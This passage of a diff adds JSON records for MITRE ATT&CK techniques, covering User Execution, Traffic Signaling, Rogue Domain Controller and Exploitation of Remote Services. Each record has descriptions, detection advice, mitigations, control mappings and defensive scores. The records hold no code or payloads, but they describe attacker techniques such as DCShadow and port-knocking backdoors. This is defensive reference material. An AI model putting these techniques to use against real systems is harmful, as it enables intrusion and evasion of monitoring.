+        "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
+        "platforms": [
+            "Containers",
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Container: Container Creation",
+            "Container: Container Start",
+            "File: File Creation",
+            "Image: Image Creation",
+            "Instance: Instance Creation",
+            "Instance: Instance Start",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1204.001",
+                "name": "User Execution: Malicious Link",
+                "url": "https://attack.mitre.org/techniques/T1204/001",
+                "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
+                "detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1204.002",
+                "name": "User Execution: Malicious File",
+                "url": "https://attack.mitre.org/techniques/T1204/002",
+                "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+                "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1204.003",
+                "name": "User Execution: Malicious Image",
+                "url": "https://attack.mitre.org/techniques/T1204/003",
+                "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)",
+                "detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 1.3118113519047618,
+        "adjusted_score": 1.3118113519047618,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "9.3",
+            "9.6",
+            "13.3",
+            "13.8",
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-44",
+            "SC-7",
+            "SI-10",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3619047619047619,
+            "mitigation_score": 0.41818181818181815,
+            "detection_score": 0.3
+        },
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.54990659
+    },
+    {
+        "tid": "T1204.001",
+        "name": "User Execution: Malicious Link",
+        "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
+        "url": "https://attack.mitre.org/techniques/T1204/001",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1204",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.3142857142857143,
+        "adjusted_score": 0.3142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "9.3",
+            "9.6",
+            "13.3",
+            "13.8",
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-44",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1204.002",
+        "name": "User Execution: Malicious File",
+        "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+        "url": "https://attack.mitre.org/techniques/T1204/002",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1204",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.42380952380952386,
+        "adjusted_score": 0.42380952380952386,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7",
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-44",
+            "SC-7",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1204.003",
+        "name": "User Execution: Malicious Image",
+        "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)",
+        "url": "https://attack.mitre.org/techniques/T1204/003",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.",
+        "platforms": [
+            "Containers",
+            "IaaS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Container: Container Creation",
+            "Container: Container Start",
+            "Image: Image Creation",
+            "Instance: Instance Creation",
+            "Instance: Instance Start"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1204",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "RA-5",
+            "SC-44",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SI-8",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1205",
+        "name": "Traffic Signaling",
+        "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)",
+        "url": "https://attack.mitre.org/techniques/T1205",
+        "tactics": [
+            "Command And Control",
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\n\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1205.001",
+                "name": "Traffic Signaling: Port Knocking",
+                "url": "https://attack.mitre.org/techniques/T1205/001",
+                "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
+                "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.22380952380952382,
+        "adjusted_score": 0.22380952380952382,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.7",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.12380952380952381,
+            "mitigation_score": 0.23636363636363636
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1205.001",
+        "name": "Traffic Signaling: Port Knocking",
+        "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
+        "url": "https://attack.mitre.org/techniques/T1205/001",
+        "tactics": [
+            "Command And Control",
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1205",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.20476190476190478,
+        "adjusted_score": 0.20476190476190478,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1207",
+        "name": "Rogue Domain Controller",
+        "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)",
+        "url": "https://attack.mitre.org/techniques/T1207",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Creation",
+            "Active Directory: Active Directory Object Modification",
+            "Network Traffic: Network Traffic Content",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.0047619047619047615,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1210",
+        "name": "Exploitation of Remote Services",
+        "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
+        "url": "https://attack.mitre.org/techniques/T1210",
+        "tactics": [
+            "Lateral Movement"
+        ],
+        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
